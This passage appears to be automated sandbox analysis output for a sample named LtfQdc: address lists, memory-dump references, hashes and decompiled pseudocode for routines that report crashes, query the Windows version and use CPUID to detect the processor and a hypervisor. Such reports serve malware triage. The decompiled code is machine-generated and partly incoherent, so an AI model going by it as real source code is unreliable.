0x00cab203
0x00cab203
0x00cab246
0x00cab248
0x00cab24c
0x00cab24c
0x00cab24c
0x00cab24f
0x00cab251
0x00cab251
0x00cab253
0x00cab256
0x00cab258
0x00000000
0x00cab25e
0x00cab25e
0x00cab25e
0x00cab261
0x00cab263
0x00cab266
0x00cab269
0x00cab270
0x00cab272
0x00cab275
0x00cab27f
0x00cab281
0x00cab287
0x00cab291
0x00cab293
0x00cab295
0x00cab26b
0x00cab26b
0x00cab26b
0x00cab29a
0x00cab29c
0x00cab29f
0x00cab2a9
0x00cab2ab
0x00cab2b1
0x00cab2bb
0x00cab2be
0x00cab2c1
0x00cab2c2
0x00cab2c4
0x00cab2c6
0x00cab2c8
0x00000000
0x00cab2ce
0x00cab2d1
0x00cab2d3
0x00cab2d6
0x00cab2d8
0x00cab2db
0x00cab2dc
0x00cab2df
0x00cab2e2
0x00cab2e7
0x00cab2e7
0x00cab2ea
0x00cab2ed
0x00cab2ef
0x00cab2f2
0x00cab2f5
0x00cab2fc
0x00cab2fe
0x00cab301
0x00cab30b
0x00cab30d
0x00cab313
0x00cab31d
0x00cab31f
0x00cab2f7
0x00cab2f7
0x00cab2f7
0x00cab321
0x00cab324
0x00cab326
0x00cab329
0x00cab32b
0x00cab32e
0x00cab331
0x00cab334
0x00cab336
0x00cab339
0x00cab33c
0x00000000
0x00cab342
0x00cab342
0x00cab344
0x00cab347
0x00cab351
0x00cab353
0x00cab359
0x00cab363
0x00cab365
0x00cab365
0x00000000
0x00cab33c
0x00cab2c8
0x00cab258
0x00000000
0x00cab1f9
0x00cab396
0x00000000
0x00cab396
0x00000000
0x00cab1d4
0x00cab1c3
0x00cab182
0x00caadd1
0x00000000
0x00caaab4
0x00caaab4
0x00caaab6
0x00caaabb
0x00caaabd
0x00000000
0x00000000
0x00caaabf
0x00000000
0x00caaabd
0x00000000
0x00caaa71
0x00caaa6b
0x00caaa5d
0x00000000
0x00caa9e5
0x00cab70b
0x00000000
0x00cab6fe
0x00cab6fe
0x00cab701
0x00cab704
0x00cab92c
0x00cab932
0x00cab941
0x00cab941
0x00cab6f8
0x00000000

Strings

__pos <= size(), xrefs: 00CAB951
%s:%d: assertion %s failed: %s, xrefs: 00CAB960
..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00CAB95B
string index out of bounds, xrefs: 00CAB94C

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$__pos <= size()$string index out of bounds
API String ID: 0-3353333773
Opcode ID: 0855c0e3cbc36eb55371c6e13fe25bfc4d71a16c47465e663778f3ed0c0498af
Instruction ID: ecc9014a60b687c036ba91cd81e00a0e1b6f984375bf82e60c55937e9747bd6b
Opcode Fuzzy Hash: 0855c0e3cbc36eb55371c6e13fe25bfc4d71a16c47465e663778f3ed0c0498af
Instruction Fuzzy Hash: 39C26D75200B029FC725CF29C484A66B7F2BF4A324F144A5CE8AA8B7A2D730FD45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CFE294 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CFE294(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00CFE202(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00D011A0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00D011A0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00CFE202(_t49);
				}
				return _t49;
			}

0x00cfe294
0x00cfe294
0x00cfe294
0x00cfe2a8
0x00cfe2aa
0x00cfe2ad
0x00cfe2ad
0x00cfe2b1
0x00cfe2b6
0x00cfe2ce
0x00cfe2d4
0x00cfe2da
0x00cfe2e0
0x00cfe2e6
0x00cfe2ec
0x00cfe2f2
0x00cfe2f9
0x00cfe300
0x00cfe307
0x00cfe30e
0x00cfe315
0x00cfe31c
0x00cfe31d
0x00cfe326
0x00cfe32c
0x00cfe32f
0x00cfe335
0x00cfe344
0x00cfe350
0x00cfe35b
0x00cfe362
0x00cfe369
0x00cfe374
0x00cfe37c
0x00cfe385
0x00cfe387
0x00cfe38a
0x00cfe38c
0x00cfe396
0x00cfe39e
0x00cfe3a4
0x00000000
0x00cfe3ab
0x00cfe3ae

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CFE2A0
IsDebuggerPresent.KERNEL32 ref: 00CFE36C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CFE38C
UnhandledExceptionFilter.KERNEL32(?), ref: 00CFE396

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 51faf5f5385d9abb0b2000af5a582226dba1a05513aceb24a8a45a699a068a6e
Instruction ID: 709b0a5dbfdeae87fc55ea343e09ee19bb6e02a524e1043910174f7e28a9c173
Opcode Fuzzy Hash: 51faf5f5385d9abb0b2000af5a582226dba1a05513aceb24a8a45a699a068a6e
Instruction Fuzzy Hash: B8312975D0531C9BDB10DFA4D989BCDBBB8AF08300F1040AAE50DAB2A0EB709B848F15

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2070 Relevance: 6.1, APIs: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00CC2070(void* __fp0) {
				signed int _v20;
				struct _OSVERSIONINFOW _v304;
				char _v308;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				intOrPtr _t21;
				intOrPtr _t27;
				signed int _t28;
				void* _t34;
				signed char* _t36;
				signed int _t37;
				void* _t45;

				_t45 = __fp0;
				_t14 =  *0xd40014; // 0xfbddd969
				_v20 = _t14 ^ _t37;
				E00D011A0(_t34,  &(_v304.dwMajorVersion), 0, 0x118);
				_v304.dwOSVersionInfoSize = 0x11c;
				_t35 =  &_v304;
				GetVersionExW( &_v304);
				_v308 = 0;
				__imp__GetProductInfo(_v304.dwMajorVersion, _v304.dwMinorVersion, 0, 0,  &_v308);
				_push(0x5c);
				_t36 = L00CFDBBC();
				_t27 = _v308;
				_t21 =  *0xd46a5c; // 0x0
				_t28 =  *0xd43e38; // 0x0
				_t33 =  *[fs:0x2c];
				if(_t21 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t28 * 4)) + 4))) {
					L00CFDC67(_t21, 0xd46a5c);
					if( *0xd46a5c == 0xffffffff) {
						asm("xorps xmm0, xmm0");
						asm("movups [0xd46a48], xmm0");
						asm("movups [0xd46a38], xmm0");
						 *0xd46a58 = 0;
						__imp__GetNativeSystemInfo(0xd46a38);
						L00CFDCDD(0xd46a5c);
					}
				}
				E00CFE643(E00CC2290(_t36, _t45, _t35, 0xd46a38), _t27, _v20 ^ _t37, _t33, _t35, _t36, _t27);
				return _t36;
			}

0x00cc2070
0x00cc207c
0x00cc2083
0x00cc2094
0x00cc209c
0x00cc20a6
0x00cc20ad
0x00cc20b3
0x00cc20d4
0x00cc20da
0x00cc20e4
0x00cc20e6
0x00cc20ec
0x00cc20f1
0x00cc20f7
0x00cc2107
0x00cc2133
0x00cc2142
0x00cc2144
0x00cc2147
0x00cc214e
0x00cc2155
0x00cc2164
0x00cc216f
0x00cc2174
0x00cc2142
0x00cc211c
0x00cc212d

APIs

GetVersionExW.KERNEL32(0000011C), ref: 00CC20AD
GetProductInfo.KERNEL32(?,?,00000000,00000000,00000000), ref: 00CC20D4
__Init_thread_header.LIBCMT ref: 00CC2133
GetNativeSystemInfo.KERNEL32(00D46A38), ref: 00CC2164

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Info$Init_thread_headerNativeProductSystemVersion
String ID:
API String ID: 2164803554-0
Opcode ID: 539f5616c2904e3a446c6282def4b1c681712d53668f4613faeb68b5d8a3e7af
Instruction ID: e3ba6ee5483fbeccd51668e030b4d0dc989e133f379ebbd8e0017c410730cac2
Opcode Fuzzy Hash: 539f5616c2904e3a446c6282def4b1c681712d53668f4613faeb68b5d8a3e7af
Instruction Fuzzy Hash: 9F21F875D003089BE720DF14EC56FE973B4EB4A710F044169F606A6290EB716A94DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00CDC650 Relevance: 5.2, Strings: 4, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E00CDC650(unsigned int* __ecx, unsigned int __edx, void* __fp0) {
				signed int _v20;
				char _v24;
				intOrPtr _v27;
				unsigned int _v28;
				intOrPtr _v31;
				unsigned int _v32;
				signed char _v36;
				intOrPtr _v40;
				unsigned int _v44;
				unsigned int _v48;
				signed char _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				signed char _v68;
				char _v72;
				unsigned int _v76;
				signed char _v80;
				unsigned int _v84;
				unsigned int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t98;
				signed int _t100;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				void* _t131;
				char _t135;
				signed char _t136;
				signed int _t139;
				unsigned int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t163;
				signed int _t174;
				unsigned int* _t176;
				signed int _t177;

				_t199 = __fp0;
				_t168 = __edx;
				_t176 = __ecx;
				_t75 =  *0xd40014; // 0xfbddd969
				_v20 = _t75 ^ _t177;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqu [ebp-0x28], xmm0");
				asm("movdqu [ebp-0x38], xmm0");
				_v27 = 0xffffffff;
				_v31 = 0xffffffff;
				asm("cpuid");
				_t171 = 0;
				_v72 = _t135;
				_v68 = __edx;
				_v64 = 0;
				_v60 = 0;
				_t136 = __ecx + 0x2c;
				E00CB4920(_t136, __fp0,  &_v72);
				if(0 <= 0) {
					L22:
					asm("cpuid");
					if(0x80000000 >= 0x80000004) {
						_t171 = 0x80000000;
						asm("cpuid");
						_v72 = 0x80000002;
						_v68 = _t136;
						_v64 = 0;
						_v60 = _t168;
						asm("cpuid");
						_v56 = 0x80000003;
						_v52 = _t136;
						_v48 = 0;
						_v44 = _t168;
						asm("cpuid");
						_v40 = 0x80000004;
						_v36 = _t136;
						_v32 = 0;
						_v28 = _t168;
						_v24 = 0;
						E00CB4920( &(_t176[0xe]), _t199,  &_v72);
						if(0x80000000 >= 0x80000007) {
							asm("cpuid");
							_t168 = _t168 & 0x00000001;
							_t176[0xa] = _t168;
						}
					}
					if(_t176[0xa] == 0) {
						if(_t176[0xa] != 0) {
							asm("cpuid");
							if(_t136 == 0x7263694d && 0 == 0x666f736f && _t168 == 0x76482074) {
								_t176[0xa] = 1;
							}
						}
					}
					if(L00CC1C30() != 0) {
						_t176[0xa] = 1;
					}
					return E00CFE643(_t81, _t136, _v20 ^ _t177, _t168, _t171, _t176);
				} else {
					_v80 = _t136;
					_v84 = 0;
					asm("cpuid");
					_v88 = 0;
					_t137 = 1;
					if(0 >= 7) {
						_v76 = 1;
						asm("cpuid");
						_t168 = __edx;
						_v84 = 0;
						_t137 = _v76;
					}
					 *_t176 = _t137;
					_t176[4] = _t137 & 0x0000000f;
					_t176[1] = _t137 >> 0x0000000c & 0x00000003;
					_t159 = _t137 >> 0x00000008 & 0x0000000f;
					_t174 = _t137 >> 0x00000004 & 0x0000000f;
					if(_t159 == 0xf) {
						_t98 = _t137 >> 0x00000010 & 0x0000000f;
						_t160 = _t137 >> 0x00000014 & 0x000000ff;
						_t139 = _t98;
						_t171 = _t174 | _t98 << 0x00000004;
						_t100 = _t160;
						_t159 = _t160 + 0xf;
						L18:
						_t176[2] = _t159;
						_t176[3] = _t171;
						_t176[6] = _t100;
						_t176[5] = _t139;
						_t176[7] = _t168 >> 0x00000017 & 0x00000001;
						_t176[7] = _t168 >> 0x00000019 & 0x00000001;
						_t176[7] = _t168 >> 0x0000001a & 0x00000001;
						_t140 = _v88;
						_t176[7] = _t140 & 0x00000001;
						_t176[8] = _t140 >> 0x00000009 & 0x00000001;
						_t176[8] = _t140 >> 0x00000013 & 0x00000001;
						_t176[8] = _t140 >> 0x00000014 & 0x00000001;
						_t176[8] = _t140 >> 0x00000017 & 0x00000001;
						_t176[0xa] = _t140 >> 0x1f;
						_t124 =  !_t140;
						if((_t124 & 0x1c000000) != 0) {
							_t125 = 0;
						} else {
							asm("xgetbv");
							_t125 =  !_t124 & 0xffffff00 | ( !_t124 & 0x00000006) == 0x00000000;
						}
						_t168 = _v84;
						_t176[9] = _t125;
						_t163 = _t140 >> 0x00000019 & 0x00000001;
						_t176[9] = _t163;
						_t136 = _t140 >> 0x0000000c & 0x00000001;
						_t176[9] = _t136;
						_t176[9] = (_t163 & 0xffffff00 | _t168 != 0x00000000) & (_t125 & 0xffffff00 | _t125 != 0x00000000);
						goto L22;
					}
					_t100 = 0;
					if(_t159 != 6) {
						_t139 = 0;
						goto L18;
					}
					_t128 = _t176[0xd] & 0x000000ff;
					_t159 = 6;
					if(_t128 < 0) {
						if(_t176[0xc] != 0xc) {
							L14:
							_t139 = 0;
							L17:
							_t100 = 0;
							goto L18;
						}
						_v80 =  *_v80;
						L12:
						_v76 = _t168;
						_t131 = L00CFFD0D(_v80, "GenuineIntel", 0xc);
						_t159 = 6;
						if(_t131 == 0) {
							_t139 = _t137 >> 0x00000010 & 0x0000000f;
							_t171 = _t174 | _t139 << 0x00000004;
						} else {
							_t139 = 0;
						}
						_t168 = _v76;
						goto L17;
					}
					if(_t128 == 0xc) {
						goto L12;
					}
					goto L14;
				}
			}

0x00cdc650
0x00cdc650
0x00cdc659
0x00cdc65b
0x00cdc662
0x00cdc665
0x00cdc669
0x00cdc66e
0x00cdc673
0x00cdc67a
0x00cdc685
0x00cdc687
0x00cdc689
0x00cdc68c
0x00cdc68f
0x00cdc692
0x00cdc696
0x00cdc69f
0x00cdc6a6
0x00cdc833
0x00cdc83a
0x00cdc841
0x00cdc843
0x00cdc84c
0x00cdc84e
0x00cdc851
0x00cdc854
0x00cdc857
0x00cdc864
0x00cdc866
0x00cdc869
0x00cdc86c
0x00cdc86f
0x00cdc87c
0x00cdc87e
0x00cdc881
0x00cdc884
0x00cdc887
0x00cdc88a
0x00cdc895
0x00cdc8a0
0x00cdc8a9
0x00cdc8ab
0x00cdc8ae
0x00cdc8ae
0x00cdc8a0
0x00cdc8b5
0x00cdc8dc
0x00cdc8e5
0x00cdc8ed
0x00cdc8ff
0x00cdc8ff
0x00cdc8ed
0x00cdc8dc
0x00cdc8be
0x00cdc8c0
0x00cdc8c0
0x00cdc8d5
0x00cdc6ac
0x00cdc6ac
0x00cdc6af
0x00cdc6bd
0x00cdc6bf
0x00cdc6c2
0x00cdc6c7
0x00cdc6d2
0x00cdc6d5
0x00cdc6d7
0x00cdc6dc
0x00cdc6df
0x00cdc6df
0x00cdc6e2
0x00cdc6e9
0x00cdc6f4
0x00cdc6fc
0x00cdc704
0x00cdc70a
0x00cdc72b
0x00cdc731
0x00cdc734
0x00cdc739
0x00cdc73b
0x00cdc73d
0x00cdc78c
0x00cdc78c
0x00cdc78f
0x00cdc792
0x00cdc795
0x00cdc79f
0x00cdc7a9
0x00cdc7b2
0x00cdc7b5
0x00cdc7bc
0x00cdc7c6
0x00cdc7d0
0x00cdc7da
0x00cdc7e4
0x00cdc7ec
0x00cdc7f1
0x00cdc7f8
0x00cdc808
0x00cdc7fa
0x00cdc7fc
0x00cdc803
0x00cdc803
0x00cdc80a
0x00cdc80d
0x00cdc815
0x00cdc818
0x00cdc81e
0x00cdc821
0x00cdc830
0x00000000
0x00cdc830
0x00cdc70c
0x00cdc711
0x00cdc742
0x00000000
0x00cdc742
0x00cdc713
0x00cdc717
0x00cdc71e
0x00cdc74a
0x00cdc776
0x00cdc776
0x00cdc78a
0x00cdc78a
0x00000000
0x00cdc78a
0x00cdc751
0x00cdc754
0x00cdc754
0x00cdc761
0x00cdc769
0x00cdc770
0x00cdc77d
0x00cdc785
0x00cdc772
0x00cdc772
0x00cdc772
0x00cdc787
0x00000000
0x00cdc787
0x00cdc722
0x00000000
0x00000000
0x00000000
0x00cdc724

Strings

osof, xrefs: 00CDC8EF
t Hv, xrefs: 00CDC8F7
GenuineIntel, xrefs: 00CDC759
Micr, xrefs: 00CDC8E7

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: _strlen
String ID: GenuineIntel$Micr$osof$t Hv
API String ID: 4218353326-1419972731
Opcode ID: 254818b223aad3c663058973114f8937b049f446a07ee28129c0c61c5d10661d
Instruction ID: b5f45a31fc98d7f89ccd27c5560426c73817576043638327a333d8334c0f269c
Opcode Fuzzy Hash: 254818b223aad3c663058973114f8937b049f446a07ee28129c0c61c5d10661d
Instruction Fuzzy Hash: 8A81E571E047468FDB24CFA988C039DBBE1AF69310F14463ED55AD7382C634EA49DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE01F0 Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 43%

			E00CE01F0(void* __ebx, intOrPtr* __ecx, void* __fp0, unsigned int _a4) {
				unsigned int _v12;
				signed int _v16;
				signed int _v24;
				unsigned int _v28;
				unsigned int _v36;
				void* __edi;
				void* __esi;
				signed int _t47;
				unsigned int* _t53;
				unsigned int _t56;
				unsigned int _t57;
				unsigned int _t59;
				unsigned int _t62;
				unsigned int _t65;
				void* _t68;
				void* _t70;
				unsigned int* _t71;
				intOrPtr _t73;
				unsigned int* _t74;
				signed int _t76;
				unsigned int* _t77;
				unsigned int* _t78;
				unsigned int _t89;
				intOrPtr _t90;
				unsigned int* _t91;
				unsigned int* _t102;
				signed int _t104;
				unsigned int _t106;
				unsigned int _t107;
				unsigned int* _t111;
				unsigned int _t112;
				unsigned int* _t115;
				unsigned int _t117;
				void* _t119;
				void* _t121;
				signed int _t122;
				void* _t124;
				signed int _t126;
				void* _t127;
				void* _t139;

				_t139 = __fp0;
				_t68 = __ebx;
				_t73 =  *__ecx;
				_pop(_t119);
				_t74 = _t73 + 0x28c;
				_t121 = _t119;
				_push(_t121);
				_t122 = _t126;
				_t127 = _t126 - 8;
				_t111 = _t74;
				_t106 = _a4;
				_t47 =  *0xd40014; // 0xfbddd969
				_v16 = _t47 ^ _t122;
				if(_t106 == 0) {
					L7:
					_t111[5] = _t111[5] + 1;
					_t76 = _t106 >> 0x13;
					_t77 =  *(0xd48a6c + _t76 * 4);
					asm("bt ecx, eax");
					if(_t76 >= 0) {
						 *((char*)((_t106 >> 0x15) + 0xd50a6c)) = 1;
					} else {
						_push(_t106);
						L00CBE930();
						_t127 = _t127 + 4;
					}
					_v28 = _t106;
					_t53 = _t111[1];
					if(_t53 >= _t111[2]) {
						_t77 = _t111;
						E00CD10C0( &_v28, _t77, _t139,  &_v28);
						_t56 = _t111[1];
					} else {
						 *_t53 = _t106;
						_v28 = 0;
						_t56 =  &(_t53[1]);
						_t111[1] = _t56;
					}
					if( *_t111 == _t56) {
						_push("back() called on an empty vector");
						_push("!empty()");
						_push(0x233);
						_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\vector");
						_t57 = L00C96D4C(_t68, _t77, _t90, _t139, "%s:%d: assertion %s failed: %s");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t78 =  &(_t77[0xa3]);
						_t124 = _t122;
						_push(_t124);
						_push(_t68);
						_push(_t106);
						_push(_t111);
						_push(_t57);
						_t112 =  *_t78;
						_t107 = _t78[1];
						if(_t112 != _t107) {
							_t57 = _v12;
							_t70 = 0;
							while( *(_t112 + _t70) != _t57) {
								_t102 =  &((_t112 + _t70)[1]);
								_t70 = _t70 + 4;
								if(_t102 != _t107) {
									continue;
								} else {
								}
								goto L41;
							}
							_t91 = _t112 + _t70;
							if(_t91 != _t107) {
								if(_t57 != 0) {
									_t78[5] = _t78[5] - 1;
								}
								if(_t78[4] ==  &(_t78[3])) {
									_t115 =  &((_t112 + _t70)[1]);
									_v36 = _t78;
									if(_t115 != _t107) {
										do {
											_t59 =  *(_t115 - 4);
											asm("bt edx, ecx");
											if(_t59 >> 0x13 < 0) {
												_push(_t59);
												L00CBEA30(_t59, _t139);
												_t127 = _t127 + 4;
											}
											 *(_t115 - 4) =  *_t115;
											 *_t115 = 0;
											_t115 =  &(_t115[1]);
										} while (_t115 != _t107);
										_t107 =  *(_v36 + 4);
										_t91 =  &(_t115[0xffffffffffffffff]);
									} else {
									}
									if(_t107 != _t91) {
										do {
											_t71 = _t91;
											_t43 = _t107 - 4; // 0xd2f0b8
											_t117 = _t43;
											_t44 = _t107 - 4; // 0xccf430
											_t62 =  *_t44;
											asm("bt edx, ecx");
											if(_t62 >> 0x13 < 0) {
												_push(_t62);
												L00CBEA30(_t62, _t139);
												_t127 = _t127 + 4;
											}
											 *(_t107 - 4) = 0;
											_t107 = _t117;
											_t91 = _t71;
										} while (_t117 != _t71);
									}
									_t57 = _v36;
									 *(_t57 + 4) = _t91;
								} else {
									_t57 =  *(_t112 + _t70);
									asm("bt edx, ecx");
									if(_t57 >> 0x13 < 0) {
										_push(_t57);
										_t57 = L00CBEA30(_t57, _t139);
										_t127 = _t127 + 4;
									}
									 *(_t112 + _t70) = 0;
								}
							}
						}
						L41:
						return _t57;
					} else {
						_t65 = _v28;
						_t104 = _t65 >> 0x13;
						_t90 =  *((intOrPtr*)(0xd48a6c + _t104 * 4));
						asm("bt edx, ecx");
						if(_t104 < 0) {
							_push(_t65);
							_t65 = L00CBEA30(_t65, _t139);
							_t127 = _t127 + 4;
						}
						goto L16;
					}
				} else {
					_t65 =  *_t111;
					_t89 = _t111[1];
					if(_t65 == _t89) {
						goto L7;
					} else {
						asm("o16 nop [cs:eax+eax]");
						while( *_t65 != _t106) {
							_t65 = _t65 + 4;
							if(_t65 != _t89) {
								continue;
							} else {
								goto L7;
							}
							goto L45;
						}
						if(_t65 != _t89) {
							L16:
							return E00CFE643(_t65, _t68, _v24 ^ _t122, _t90, _t106, _t111);
						} else {
							goto L7;
						}
					}
				}
				L45:
			}

0x00ce01f0
0x00ce01f0
0x00ce01f3
0x00ce01f5
0x00cf7753
0x00cf7759
0x00cf7760
0x00cf7761
0x00cf7765
0x00cf7768
0x00cf776a
0x00cf776d
0x00cf7774
0x00cf7779
0x00cf779f
0x00cf779f
0x00cf77a9
0x00cf77ac
0x00cf77b3
0x00cf77b6
0x00cf77c8
0x00cf77b8
0x00cf77b8
0x00cf77b9
0x00cf77be
0x00cf77be
0x00cf77cf
0x00cf77d2
0x00cf77d8
0x00cf77ee
0x00cf77f1
0x00cf77f6
0x00cf77da
0x00cf77da
0x00cf77dc
0x00cf77e3
0x00cf77e6
0x00cf77e6
0x00cf77fb
0x00cf783b
0x00cf7840
0x00cf7845
0x00cf784a
0x00cf7854
0x00cf7859
0x00cf785a
0x00cf785b
0x00cf785c
0x00cf785d
0x00cf785e
0x00cf785f
0x00cf7863
0x00cf7869
0x00cf7870
0x00cf7873
0x00cf7874
0x00cf7875
0x00cf7876
0x00cf7877
0x00cf7879
0x00cf787e
0x00cf7884
0x00cf7887
0x00cf7890
0x00cf7898
0x00cf789b
0x00cf78a0
0x00000000
0x00000000
0x00cf78a2
0x00000000
0x00cf78a0
0x00cf78a7
0x00cf78ac
0x00cf78b4
0x00cf78b6
0x00cf78b6
0x00cf78bf
0x00cf78ee
0x00cf78f3
0x00cf78f6
0x00cf7912
0x00cf7912
0x00cf7926
0x00cf7929
0x00cf792b
0x00cf792c
0x00cf7931
0x00cf7931
0x00cf7902
0x00cf7905
0x00cf790b
0x00cf790e
0x00cf7939
0x00cf793f
0x00000000
0x00cf78f8
0x00cf7943
0x00cf796f
0x00cf796f
0x00cf7971
0x00cf7971
0x00cf7974
0x00cf7974
0x00cf7988
0x00cf798b
0x00cf798d
0x00cf798e
0x00cf7993
0x00cf7993
0x00cf7960
0x00cf7967
0x00cf7969
0x00cf796b
0x00cf796f
0x00cf7945
0x00cf7948
0x00cf78c1
0x00cf78c1
0x00cf78d5
0x00cf78d8
0x00cf78da
0x00cf78db
0x00cf78e0
0x00cf78e0
0x00cf78e3
0x00cf78e3
0x00cf78bf
0x00cf78ac
0x00cf794b
